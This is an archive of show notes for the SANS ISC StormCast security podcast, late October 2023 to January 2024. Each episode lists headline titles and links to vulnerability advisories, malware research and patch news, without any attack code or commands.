macOS Python Script Replacing Wallet Applications with Rogue Apps https://isc.sans.edu/diary/macOS%20Python%20Script%20Replacing%20Wallet%20Applications%20with%20Rogue%20Apps/30572
Microsoft Breach https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/
Juniper Vulnerabilities https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
Brave Removing Strict Fingerprint Mode https://brave.com/privacy-updates/28-sunsetting-strict-fingerprinting-mode/
1/22/2024 (6 minutes, 37 seconds)

ISC StormCast for Friday, January 19th, 2024

More Scans for Ivanti Connect "Secure" VPN. Exploits Public https://isc.sans.edu/diary/More%20Scans%20for%20Ivanti%20Connect%20%22Secure%22%20VPN.%20Exploits%20Public/30568
Ivanti Endpoint Manager Mobile / MobileIron Core Vuln exploited CVE-2023-35082 https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Attacks against Exposed Databases https://twitter.com/fasterthanlime/status/1741935393413402739
Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
1/19/2024 (6 minutes, 38 seconds)

ISC StormCast for Thursday, January 18th, 2024

Number Usage in Passwords https://isc.sans.edu/diary/Number%20Usage%20in%20Passwords/30540
A Lightweight Method to Detect Potential iOS Malware https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/
CISA and FBI Release Known IOCs Associated with Androxgh0st Malware https://www.cisa.gov/news-events/alerts/2024/01/16/cisa-and-fbi-release-known-iocs-associated-androxgh0st-malware
1/18/2024 (6 minutes, 45 seconds)

ISC StormCast for Wednesday, January 17th, 2024

Ivanti Vulnerability Widespread Scanning https://isc.sans.edu/diary/Scans%20for%20Ivanti%20Connect%20%22Secure%22%20VPN%20%20Vulnerability%20%28CVE-2023-46805%2C%20CVE-2024-21887%29/30562 https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/
Citrix Patches Already Exploited Vulnerability https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549
Atlassian Confluence Remote Code Execution Vulnerability https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
macOS Infostealers https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/
Google Chrome 0-day https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html
GitHub Key Rotation https://www.bleepingcomputer.com/news/security/github-rotates-keys-to-mitigate-impact-of-credential-exposing-flaw/
1/17/2024 (5 minutes, 42 seconds)

ISC StormCast for Tuesday, January 16th, 2024

One File, Two Payloads https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558
Ivanti Vulnerability Updates https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/
NVidia DGX H100 and A100 Updates https://nvidia.custhelp.com/app/answers/detail/a_id/5510
GitLab Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2023-7028
1/16/2024 (6 minutes)

ISC StormCast for Friday, January 12th, 2024

Timeline to Remove DSA Support in OpenSSH https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-January/000156.html
Juniper Patches https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&numberOfResults=50&f:ctype=[Security%20Advisories]
ManageEngine ADSelfService Plus Patch CVE-2024-0252 https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html
Atomic Stealer for Mac Update https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version
1/12/2024 (5 minutes, 48 seconds)

ISC StormCast for Thursday, January 11th, 2024

Jenkins Brute Force Scans https://isc.sans.edu/diary/Jenkins%20Brute%20Force%20Scans/30546
Ivanti Connect Secure VPN Vulnerability Exploited https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
Zoom Privilege Escalation Vulnerability https://www.zoom.com/en/trust/security-bulletin/ZSB-24001/
Apache Applications Targeted by Stealthy Attacker https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker
Infosec Toolshed https://youtu.be/qDK1PQ1OZjk?si=_vTpHqlovD2Hjd4M
1/11/2024 (5 minutes, 12 seconds)

ISC StormCast for Wednesday, January 10th, 2024

Microsoft January 2024 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2024+Patch+Tuesday/30548/
Adobe Vulnerabilities https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html
CVE-2023-50916: Authentication Coercion Vulnerability in Kyocera Device Manager https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-50916-authentication-coercion-vulnerability-in-kyocera-device-manager/
Network Connected Wrenches Used in Factories Can Be Hacked https://arstechnica.com/security/2024/01/network-connected-wrenches-used-in-factories-can-be-hacked-for-sabotage-or-ransomware/
1/10/2024 (6 minutes, 6 seconds)

ISC StormCast for Tuesday, January 9th, 2024

What is That User Agent? https://isc.sans.edu/diary/What%20is%20that%20User%20Agent%3F/30536
KyberSlash Vulnerability https://kyberslash.cr.yp.to/faq.html
Netfilter DoS Vulnerability CVE-2024-0193 https://access.redhat.com/security/cve/CVE-2024-0193
Cacti Vulnerability https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp
1/9/2024 (6 minutes, 5 seconds)

ISC StormCast for Monday, January 8th, 2024

Netstat, But Better and in PowerShell https://isc.sans.edu/diary/Netstat%2C%20but%20Better%20and%20in%20PowerShell/30532
Double Phishing Submission https://isc.sans.edu/diary/Are%20you%20sure%20of%20your%20password%3F/30534
Suspicious Prometei Botnet Activity https://isc.sans.edu/diary/Suspicious%20Prometei%20Botnet%20Activity/30538
Spectral Blur Mac Malware https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html
Google: Malware Abusing API is Standard Token Theft, not an API Issue https://www.bleepingcomputer.com/news/security/google-malware-abusing-api-is-standard-token-theft-not-an-api-issue/
1/8/2024 (5 minutes, 8 seconds)

ISC StormCast for Friday, January 5th, 2024

Wireshark Updates https://isc.sans.edu/diary/Wireshark%20updates/30528
Android Updates https://source.android.com/docs/security/bulletin/2024-01-01
Ivanti Critical Vulnerability https://forums.ivanti.com/s/article/SA-2023-12-19-CVE-2023-39336?language=en_US
Malicious PyPI Packages https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices
"everything" npm package https://www.bleepingcomputer.com/news/security/everything-blocks-devs-from-removing-their-own-npm-packages/
1/5/2024 (5 minutes, 7 seconds)

ISC StormCast for Thursday, January 4th, 2024

Interesting large and small malspam attachments from 2023 https://isc.sans.edu/diary/Interesting%20large%20and%20small%20malspam%20attachments%20from%202023/30524
Orange Spain RIPE Account Compromise https://www.bleepingcomputer.com/news/security/hacker-hijacks-orange-spain-ripe-account-to-cause-bgp-havoc/
Bitwarden Heist https://blog.redteam-pentesting.de/2024/bitwarden-heist/
Apple iOS PoC Exploits https://github.com/felix-pb/kfd/blob/main/writeups/smith.md https://github.com/felix-pb/kfd/blob/main/writeups/landa.md
1/4/2024 (6 minutes, 26 seconds)

ISC StormCast for Wednesday, January 3rd, 2024

Fingerprinting SSH Identification Strings https://isc.sans.edu/diary/Fingerprinting%20SSH%20Identification%20Strings/30520
Google OAuth2 Exploited by Malware https://www.cloudsek.com/blog/compromising-google-accounts-malwares-exploiting-undocumented-oauth2-functionality-for-session-hijacking
TsuKing DNS Amplification https://lixiang521.com/publication/ccs23/ccs23-xu-tsuking.pdf
1/3/2024 (8 minutes, 46 seconds)

ISC StormCast for Tuesday, January 2nd, 2024

Shall We Play a Game https://isc.sans.edu/diary/Shall+We+Play+a+Game/30510
Mailtrap.io Exfiltration https://isc.sans.edu/diary/Python%20Keylogger%20Using%20Mailtrap.io/30512
Pi-Hole Docker https://isc.sans.edu/forums/diary/Pi-Hole%20Pi4%20Docker%20Deployment/30516/
Mirai Update https://isc.sans.edu/diary/Unveiling%20the%20Mirai%3A%20Insights%20into%20Recent%20DShield%20Honeypot%20Activity%20%5BGuest%20Diary%5D/30514
Barracuda 0-Day Vulnerability https://www.barracuda.com/company/legal/esg-vulnerability
Apache OFBiz 0-Day Exploited against Atlassian (and possibly others) https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/
1/2/2024 (6 minutes, 10 seconds)

ISC StormCast for Friday, December 22nd, 2023

Securing Web Servers https://isc.sans.edu/diary/How%20to%20Protect%20your%20Webserver%20from%20Directory%20Enumeration%20Attack%20%3F%20Apache2%20%5BGuest%20Diary%5D/30504
Chrome 0-Day (last one for the year?) https://chromereleases.googleblog.com/2023/12/stable-channel-update-for-desktop_20.html
Note that there will be no daily Stormcast for the rest of the year. Returning January 2nd.
SANS Cloud Defender 2024 https://www.sans.org/cyber-security-training-events/cloud-defender-2024-live-online/
12/22/2023 (4 minutes, 48 seconds)

ISC StormCast for Thursday, December 21st, 2023

Increase in Exploit Attempts for Atlassian Confluence Server (CVE-2023-22518) https://isc.sans.edu/diary/Increase%20in%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20Server%20%28CVE-2023-22518%29/30502
Fake F5 BIG-IP Update https://www.bleepingcomputer.com/news/security/fake-f5-big-ip-zero-day-warning-emails-push-data-wipers/
Google OAuth Problems https://trufflesecurity.com/blog/google-oauth-is-broken-sort-of/
Remembering Adrien de Beaupre https://www.hpmcgarry.ca/memorials/ernest-adrien-de-beaupre/5344136/index.php
12/21/2023 (7 minutes, 16 seconds)

ISC StormCast for Wednesday, December 20th, 2023

What are they looking for? Scans for OpenID Connect Configuration https://isc.sans.edu/diary/What%20are%20they%20looking%20for%3F%20Scans%20for%20OpenID%20Connect%20Configuration%20%28Update%3A%20CitrixBleed%29/30498
Terrapin Attack Against SSH https://terrapin-attack.com/TerrapinAttack.pdf
ALPHV/Blackcat Ransomware Disrupted and Decryptor Available https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant
12/20/2023 (6 minutes, 11 seconds)

ISC StormCast for Tuesday, December 19th, 2023

SMTP Smuggling - Spoofing E-Mails Worldwide https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
Ledger Supply Chain Attack https://www.ledger.com/blog/a-letter-from-ledger-chairman-ceo-pascal-gauthier-regarding-ledger-connect-kit-exploit
December Windows 11 Patch Breaks Wi-Fi Connectivity https://www.bleepingcomputer.com/news/microsoft/decembers-windows-11-kb5033375-update-breaks-wi-fi-connectivity/
12/19/2023 (6 minutes, 10 seconds)

ISC StormCast for Monday, December 18th, 2023

An Example of a RocketMQ Exploit Scanner https://isc.sans.edu/diary/An%20Example%20of%20RocketMQ%20Exploit%20Scanner/30492
C# Payload Phoning to a Cobalt Strike Server https://isc.sans.edu/diary/CSharp%20Payload%20Phoning%20to%20a%20CobaltStrike%20Server/30490
3CX SQL Injection Vulnerability https://www.3cx.com/blog/news/sql-database-integration/
QNAP Viostor 0-Day Vulnerability https://www.akamai.com/blog/security-research/qnap-viostor-zero-day-vulnerability-spreading-mirai-patched
pfSense Vulnerability https://www.sonarsource.com/blog/pfsense-vulnerabilities-sonarcloud/
SANS Holiday Hack Challenge https://sans.org/holidayhack
12/18/2023 (10 minutes, 19 seconds)

ISC StormCast for Friday, December 15th, 2023

T-shooting Terraform for DShield Honeypot in Azure https://isc.sans.edu/diary/T-shooting%20Terraform%20for%20DShield%20Honeypot%20in%20Azure%20%5BGuest%20Diary%5D/30484
Ubiquiti UniFi Cameras Visible in Wrong Account https://community.ui.com/questions/Bug-Fix-Cloud-Access-Misconfiguration/fe8d4479-e187-4471-bf95-b2799183ceb7
Zoom Vulnerabilities and VISS https://viss.zoom.com/specifications https://www.zoom.com/en/trust/security-bulletin/
Squid Denial of Service Vulnerability https://github.com/squid-cache/squid/security/advisories/GHSA-wgq4-4cfg-c4x3
12/15/2023 (5 minutes, 23 seconds)

ISC StormCast for Thursday, December 14th, 2023

Malicious Python Script with a TCL/TK GUI https://isc.sans.edu/diary/Malicious%20Python%20Script%20with%20a%20TCL%20TK%20GUI/30478
Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
TeamCity Exploited https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Sophos Firewall Exploit for EOL Devices CVE-2022-3236 https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce
12/14/2023 (5 minutes, 9 seconds)

ISC StormCast for Wednesday, December 13th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20December%202023/30480
Microsoft Warns of Malicious OAuth Applications https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/
Apache Struts2 Exploit CVE-2023-50164 https://xz.aliyun.com/t/13172
12/13/2023 (6 minutes, 3 seconds)

ISC StormCast for Tuesday, December 12th, 2023

What is Sitemap.xml and Why a Pentester Should Care https://isc.sans.edu/diary/What%20is%20sitemap.xml%2C%20and%20Why%20a%20Pentester%20Should%20Care/30472
Apple Patches Everything https://isc.sans.edu/forums/diary/Apple%20Patches%20Everything/30474/
Android Password Manager AutoSpill https://i.blackhat.com/EU-23/Presentations/EU-23-Gangwal-AutoSpill-Zero-Effort-Credential-Stealing.pdf
12/12/2023 (5 minutes, 35 seconds)

ISC StormCast for Monday, December 11th, 2023

IPv4-Mapped IPv6 Addresses https://isc.sans.edu/diary/IPv4-mapped%20IPv6%20Address%20Used%20For%20Obfuscation/30466
Honeypots: From the Skeptical Beginner to the Tactical Enthusiast https://isc.sans.edu/diary/Honeypots%3A%20From%20the%20Skeptical%20Beginner%20to%20the%20Tactical%20Enthusiast/30468
Bluetooth Weakness CVE-2023-45866 https://github.com/skysafe/reblog/tree/main/cve-2023-45866
Syrus 4 IoT Gateway Vulnerability CVE-2023-6248 https://socradar.io/syrus4-iot-gateway-vulnerability-could-allow-code-execution-on-thousands-of-vehicles-simultaneously-cve-2023-6248/
Microsoft Edge Vulnerability CVE-2023-35618 https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security#december-7-2023
12/11/2023 (6 minutes, 15 seconds)

ISC StormCast for Friday, December 8th, 2023

5G Vulnerabilities (5Ghoul) https://isc.sans.edu/diary/5Ghoul%3A%20Impacts%2C%20Implications%20and%20Next%20Steps/30462
Revealing the Hidden Risks of QR Codes https://isc.sans.edu/diary/Revealing%20the%20Hidden%20Risks%20of%20QR%20Codes%20%5BGuest%20Diary%5D/30458
Windows 10 End of Support https://techcommunity.microsoft.com/t5/windows-it-pro-blog/plan-for-windows-10-eos-with-windows-11-windows-365-and-esu/ba-p/4000414
Apache Struts 2 Vulnerability CVE-2023-50164 https://cwiki.apache.org/confluence/display/WW/S2-066
12/8/2023 (6 minutes, 14 seconds)

ISC StormCast for Thursday, December 7th, 2023

Whose packet is it anyway: a new RFC for attribution of internet probes https://isc.sans.edu/forums/diary/Whose%20packet%20is%20it%20anyway%3A%20a%20new%20RFC%20for%20attribution%20of%20internet%20probes/30456/
MLflow Vulnerability https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security https://mlflow.org/category/news/index.html
Abusing STS Tokens https://redcanary.com/blog/aws-sts/
Atlassian Vulnerabilities https://confluence.atlassian.com/security/security-advisories-bulletins-1236937381.html
Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge-2023/
12/7/2023 (5 minutes, 50 seconds)

ISC StormCast for Wednesday, December 6th, 2023

Cobalt Strike's "Runtime Configuration" https://isc.sans.edu/diary/Cobalt%20Strike%27s%20%22Runtime%20Configuration%22/30426
Adobe ColdFusion Exploit Abused https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-339a
Atos Unify OpenScape Vulnerability https://sec-consult.com/vulnerability-lab/advisory/argument-injection-vulnerability-in-multiple-atos-unify-openscape-products/
ExtremeXOS Vulnerabilities https://rhinosecuritylabs.com/research/extreme-networks-extremexos-vulnerabilities/
12/6/2023 (5 minutes, 34 seconds)

ISC StormCast for Tuesday, December 5th, 2023

Zarya Hacktivists: More than just SharePoint https://isc.sans.edu/diary/Zarya%20Hacktivists%3A%20More%20than%20just%20Sharepoint./30450
ICANN Registration Data Request Service (RDRS) https://rdrs.icann.org/
Android Updates https://source.android.com/docs/security/bulletin/2023-12-01
GitLab Patches https://about.gitlab.com/releases/2023/11/30/security-release-gitlab-16-6-1-released/
12/5/2023 (6 minutes)

ISC StormCast for Monday, December 4th, 2023

UEFI Exploit via Boot Image (LogoFAIL) https://binarly.io/posts/The_Far_Reaching_Consequences_of_LogoFAIL/index.html
Fake Phishing Scam Tricks Users into Installing Backdoor Plugin https://www.wordfence.com/blog/2023/12/psa-fake-cve-2023-45124-phishing-scam-tricks-users-into-installing-backdoor-plugin/
Qlik Sense Exploited by Cactus Ransomware https://arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/ https://www.praetorian.com/blog/qlik-sense-technical-exploit/
VMware Vulnerability Patched https://www.vmware.com/security/advisories/VMSA-2023-0026.html
12/4/2023 (6 minutes, 1 second)

ISC StormCast for Friday, December 1st, 2023

Apple Updates https://isc.sans.edu/diary/Apple+Patches+Exploited+WebKit+Vulnerabilitiues+in+iOSiPadOSmacOS/30444
Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today https://isc.sans.edu/forums/diary/Prophetic+Post+by+Intern+on+CVE20231389+Foreshadows+Mirai+Botnet+Expansion+Today/30442/
Zyxel Vulnerabilities https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-authentication-bypass-and-command-injection-vulnerabilities-in-nas-products
SolarWinds Update https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-4_release_notes.htm#link3
DNS Looking Glass https://isc.sans.edu/tools/dnslookup/
12/1/2023 (5 minutes, 35 seconds)

ISC StormCast for Thursday, November 30th, 2023

Decoding the Patterns: Analyzing DShield Honeypot Activity https://isc.sans.edu/diary/Decoding%20the%20Patterns%3A%20Analyzing%20DShield%20Honeypot%20Activity%20%5BGuest%20Diary%5D/30428
Arcserve Unified Data Protection Multiple Vulnerabilities https://www.tenable.com/security/research/tra-2023-37
Hikvision Vulnerabilities https://www.hikvision.com/hk/support/cybersecurity/security-advisory/security-vulnerability-in-some-hikvision-products/
Assessing Prompt Injection Risks in 200+ Custom GPTs https://arxiv.org/pdf/2311.11538.pdf
11/30/2023 (5 minutes, 31 seconds)

ISC StormCast for Wednesday, November 29th, 2023

Pro-Russian Attackers Scanning for SharePoint Servers to Exploit CVE-2023-29357 https://isc.sans.edu/diary/Pro%20Russian%20Attackers%20Scanning%20for%20Sharepoint%20Servers%20to%20Exploit%20CVE-2023-29357/30436
Microsoft Deprecates Microsoft Defender Application Guard for Office https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features
Synology Vulnerability https://www.synology.com/en-global/security/advisory/Synology_SA_23_16
Apache Tomcat Request Smuggling Vulnerability CVE-2023-46589 https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr
11/29/2023 (5 minutes, 36 seconds)

ISC StormCast for Tuesday, November 28th, 2023

Scans for ownCloud Vulnerability (CVE-2023-49103) https://isc.sans.edu/diary/Scans%20for%20ownCloud%20Vulnerability%20%28CVE-2023-49103%29/30432
Windows Hello Fingerprint Reader Weakness https://blackwinghq.com/blog/posts/a-touch-of-pwn-part-i/
11/28/2023 (6 minutes, 37 seconds)

ISC StormCast for Monday, November 27th, 2023

DShield Birthday https://isc.sans.edu/diary/Happy%20Birthday%20DShield/30420
Mirai uses CVE-2023-1389 https://isc.sans.edu/diary/CVE-2023-1389%3A%20A%20New%20Means%20to%20Expand%20Botnets/30418
More Mirai Vulnerabilities https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days
Analyzing OVA Files https://isc.sans.edu/diary/OVA%20Files/30424
Static Code Injections in OpenCart (CVE-2023-47444) https://github.com/opencart/opencart/issues/12947
Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge-2023/
11/27/2023 (6 minutes, 1 second)

ISC StormCast for Friday, November 17th, 2023

Beyond -n: Optimizing tcpdump performance https://isc.sans.edu/forums/diary/Beyond%20-n%3A%20Optimizing%20tcpdump%20performance/30408/
Zimbra 0-day used to target international government organizations https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/
FortiSIEM OS command injection in Report Server https://www.fortiguard.com/psirt/FG-IR-23-135
AI Exploit Collection https://github.com/protectai/ai-exploits
CrushFTP Remote Code Execution https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
Scott Poley: The Cyber Data Paradox: Storing Less, Discovering More https://www.sans.edu/cyber-research/cyber-data-paradox-storing-less-discovering-more/
11/17/2023 (15 minutes, 24 seconds)

ISC StormCast for Thursday, November 16th, 2023

Redline Dropped Through MSIX Package https://isc.sans.edu/diary/Redline%20Dropped%20Through%20MSIX%20Package/30404
ChatGPT Code Interpreter Security Hole https://www.tomshardware.com/news/chatgpt-code-interpreter-security-hole
Directory Traversal in Reactor Netty CVE-2023-34062 https://spring.io/security/cve-2023-34062
Aruba Networking Product Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-017.txt
HARArmor https://harmor.dev/
11/16/2023 (5 minutes, 57 seconds)

ISC StormCast for Wednesday, November 15th, 2023

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20November%202023/30400
Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
Intel CPU Glitch State Patch (Reptar) https://lock.cmpxchg8b.com/reptar.html https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00950.html
11/15/2023 (7 minutes, 10 seconds)

ISC StormCast for Tuesday, November 14th, 2023

Noticing command and control channels by reviewing DNS protocols https://isc.sans.edu/diary/Noticing%20command%20and%20control%20channels%20by%20reviewing%20DNS%20protocols/30396
Passive SSH Key Compromise via Lattices https://eprint.iacr.org/2023/1711.pdf
Juniper Vulnerabilities Exploited https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US
11/14/2023 (5 minutes, 4 seconds)

ISC StormCast for Monday, November 13th, 2023

Routers Targeted for Gafgyt Botnet https://isc.sans.edu/forums/diary/Routers%20Targeted%20for%20Gafgyt%20Botnet%20%5BGuest%20Diary%5D/30390/
ScreenConnect used to Attack Healthcare https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack
Fake Skills Assessment Portals Associated with Sapphire Sleet https://twitter.com/MsftSecIntel/status/1722316019920728437
OpenVPN Access Server Vulnerabilities https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
11/13/2023 (5 minutes, 46 seconds)

ISC StormCast for Friday, November 10th, 2023

Visual Examples of Code Injection https://isc.sans.edu/diary/Visual%20Examples%20of%20Code%20Injection/30388
SysAid Exploited by Cl0p Ransomware (CVE-2023-47246) https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
WS_FTP Server Update CVE-2023-42659 https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-November-2023
Malvertiser copies PC news site to deliver infostealer https://www.malwarebytes.com/blog/threat-intelligence/2023/11/malvertiser-copies-pc-news-site-to-deliver-infostealer
pyArrow/Apache Arrow Vulnerability https://lists.apache.org/thread/yhy7tdfjf9hrl9vfrtzo8p2cyjq87v7n
11/10/2023 (5 minutes, 25 seconds)

ISC StormCast for Thursday, November 9th, 2023

Example of a Phishing Campaign Project File https://isc.sans.edu/diary/Example%20of%20Phishing%20Campaign%20Project%20File/30384
Cryptomining with Microsoft Azure Automation Services https://www.safebreach.com/blog/cryptocurrency-miner-microsoft-azure
Windows 11 Insider Changing Firewall Behaviour https://blogs.windows.com/windows-insider/2023/11/08/announcing-windows-11-insider-preview-build-25992-canary-channel/
CISA Adds SLP Vulnerability to Known Exploited Vulnerability List https://www.cisa.gov/news-events/alerts/2023/11/08/cisa-adds-one-known-exploited-vulnerability-catalog
11/9/2023 (5 minutes, 21 seconds)

ISC StormCast for Wednesday, November 8th, 2023

What's Normal: New uses of DNS, Discovery of Designated Resolvers (DDR) https://isc.sans.edu/diary/What%27s%20Normal%3A%20New%20uses%20of%20DNS%2C%20Discovery%20of%20Designated%20Resolvers%20%28DDR%29/30380
BlueNoroff macOS Malware https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/
Emphasizing Security by Default with Advanced Microsoft Authenticator Features https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/emphasizing-security-by-default-with-advanced-microsoft/ba-p/3773130
11/8/2023 (6 minutes, 22 seconds)

ISC StormCast for Tuesday, November 7th, 2023

Confluence CVE-2023-22518 Exploited https://isc.sans.edu/diary/Exploit%20Activity%20for%20CVE-2023-22518%2C%20Atlassian%20Confluence%20Data%20Center%20and%20Server/30376
Google Threat Horizons Report https://services.google.com/fh/files/blogs/gcat_threathorizons_full_oct2023.pdf https://www.sans.edu/cyber-research/bookmark-bruggling-novel-data-exfiltration-with-brugglemark/
Veeam Update https://www.veeam.com/kb4508
QNAP Update https://www.qnap.com/de-de/security-advisory/qsa-23-35
11/7/2023 (6 minutes, 11 seconds)

ISC StormCast for Monday, November 6th, 2023

New Microsoft Exchange Zero Days https://www.bleepingcomputer.com/news/microsoft/new-microsoft-exchange-zero-days-allow-rce-data-theft-attacks/
StripedFly: Perennially Flying under the Radar https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/
Send My: Sending Data over Apple's Find My Network https://github.com/positive-security/send-my
11/6/2023 (7 minutes, 7 seconds)

ISC StormCast for Friday, November 3rd, 2023

Quick Tip for Artificially Inflated PE Files https://isc.sans.edu/diary/Quick%20Tip%20For%20Artificially%20Inflated%20PE%20Files/30370
Apache ActiveMQ Flaw Exploited https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
Critical Firepower Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-29MP49hN
Dozens of npm Packages Caught Attempting to Deploy Reverse Shell https://blog.phylum.io/dozens-of-npm-packages-caught-attempting-to-deploy-reverse-shell/
11/3/2023 (5 minutes, 22 seconds)

ISC StormCast for Thursday, November 2nd, 2023

Malware Dropped Through a ZPAQ Archive https://isc.sans.edu/forums/diary/Malware%20Dropped%20Through%20a%20ZPAQ%20Archive/30366/
CVSS 4.0 Now Official https://www.first.org/cvss/v4-0/index.html
MOZI Botnet Killswitch https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
URL Shorteners in .us https://securityonline.info/infoblox-uncovers-malicious-wave-in-us-domain-registrations/
Impersonating Slack Users https://falconspy.org/redteam/tradecraft/2023/10/05/2023-10-05-Slack-Impersonation.html
11/2/2023 (5 minutes, 43 seconds)

ISC StormCast for Wednesday, November 1st, 2023

Multiple Layers of Anti-Sandboxing Techniques https://isc.sans.edu/diary/Multiple%20Layers%20of%20Anti-Sandboxing%20Techniques/30362
CVE-2023-22518 Improper Authorization Vulnerability in Confluence Data Center and Server https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
Malvertisement Promotes Malicious PyCharm Version https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza
Thorn SFTP Gateway Java Deserialization RCE CVE-2016-1000027 CVE-2023-47174 https://help.thorntech.com/docs/sftp-gateway-gcp-3.0/gcp-java-deserialization-rce/
11/1/2023 (4 minutes, 11 seconds)

ISC StormCast for Tuesday, October 31st, 2023

Flying under the Radar: The Privacy Impact of Multicast DNS https://isc.sans.edu/forums/diary/Flying%20under%20the%20Radar%3A%20The%20Privacy%20Impact%20of%20multicast%20DNS/30358/
Kubernetes ingress-nginx vulnerability https://github.com/kubernetes/ingress-nginx/issues/10571
Google Chrome HTTPS Upgrade https://github.com/dadrian/https-upgrade/blob/main/explainer.md
WordPad PoC CVE-2023-36563 https://www.dillonfrankesecurity.com/posts/cve-2023-36563-wordpad-analysis/
10/31/2023 (6 minutes, 14 seconds)

ISC StormCast for Monday, October 30th, 2023

Size Matters for Many Security Controls https://isc.sans.edu/diary/Size%20Matters%20for%20Many%20Security%20Controls/30352
Spam or Phishing? Looking for Credentials and Passwords https://isc.sans.edu/diary/Spam%20or%20Phishing%3F%20Looking%20for%20Credentials%20%26%20Passwords/30354
iOS Leaks MAC Address https://www.youtube.com/watch?v=T3XABxNogTA
Zero Day Initiative Pwn2Own Summary https://www.zerodayinitiative.com/blog/2023/10/24/pwn2own-toronto-2023-day-one-results https://www.zerodayinitiative.com/blog/2023/10/25/pwn2own-toronto-2023-day-two-results https://www.zerodayinitiative.com/blog/2023/10/26/pwn2own-toronto-2023-day-three-results
Microsoft Octo Tempest Writeup https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/
10/30/2023, 6 minutes, 7 seconds

ISC StormCast for Friday, October 27th, 2023

